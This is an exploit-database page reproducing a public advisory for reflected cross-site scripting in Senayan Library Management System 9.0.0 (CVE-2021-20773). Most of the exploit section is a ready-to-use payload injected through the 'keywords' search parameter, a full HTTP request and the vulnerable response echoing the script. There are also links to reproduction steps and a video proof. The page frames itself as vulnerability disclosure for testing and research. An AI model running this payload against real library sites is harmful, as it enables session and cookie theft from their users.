Advertisement






Senayan Library Management System 9.0.0 Cross Site Scripting

CVE Category Price Severity
CVE-2021-20773 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2022-12-11
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022120025

Below is a copy:

Senayan Library Management System 9.0.0 Cross Site Scripting
## Title: Senayan Library Management System v9.0.0 a.k.a SLIMS 9
Multiple XSS-Reflected vulnerabilities
## Author: nu11secur1ty
## Date: 12.09.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0

## Description:
The value of the keywords request parameter is copied into the value
of an HTML tag attribute which is encapsulated in double quotation
marks.
The payload m8vzl"><script>alert(hello_vulnerability)</script>hidhc
was submitted in the keywords parameter.
This input was echoed unmodified in the application's response.

## STATUS: HIGH Vulnerability

[+] Payload:

```GET
GET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhju
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=wd4iuxeo08r8d72ubgugx0nc5fylp2k6o9l4h6ywn
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0

```
[+] Response:

```HTTP/1
HTTP/1.1 200 OK
Date: Fri, 09 Dec 2022 06:23:20 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
X-Frame-Options: SAMEORIGIN
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29492

<!--
# ===============================
# Classic SLiMS Template
# ===============================
# @Author: Waris Agung Widodo
# @Email:  [email protected]
# @Date:   2018-01-23T11:25:57+07:00
# @Last modified by:   Waris Agung Widodo
# @Last modified time: 2019-01-03T11:25:57+07:00
-->
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Open Source Library Management System | Senayan</title>
    <meta name="viewport" content="width=device-width,
initial-scale=1, shrink-to-fit=no">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <meta http-equiv="Pragma" content="no-cache"/>
    <meta http-equiv="Cache-Control" content="no-store, no-cache,
must-revalidate, post-check=0, pre-check=0"/>
    <meta http-equiv="Expires" content="Sat, 26 Jul 1997 05:00:00 GMT"/>

        <meta name="description" content="Open Source Library
Management System | Senayan">
      <meta name="keywords" content="Open Source Library Management System">
      <meta name="viewport" content="width=device-width,
height=device-height, initial-scale=1">
    <meta name="generator" content="SLiMS 9 (Bulian)">
    <meta name="theme-color" content="#000">

    <meta property="og:locale" content="en_US"/>
    <meta property="og:type" content="book"/>
    <meta property="og:title" content="Open Source Library Management
System | Senayan"/>
        <meta property="og:description" content="Open Source Library
Management System"/>
      <meta property="og:url"
content="//pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl"><script>alert(document.cookie)</script>hidhc"/>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0)

## Proof and Exploit:
[href](https://streamable.com/ac60v3)

## Time spent
`01:00:00`

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum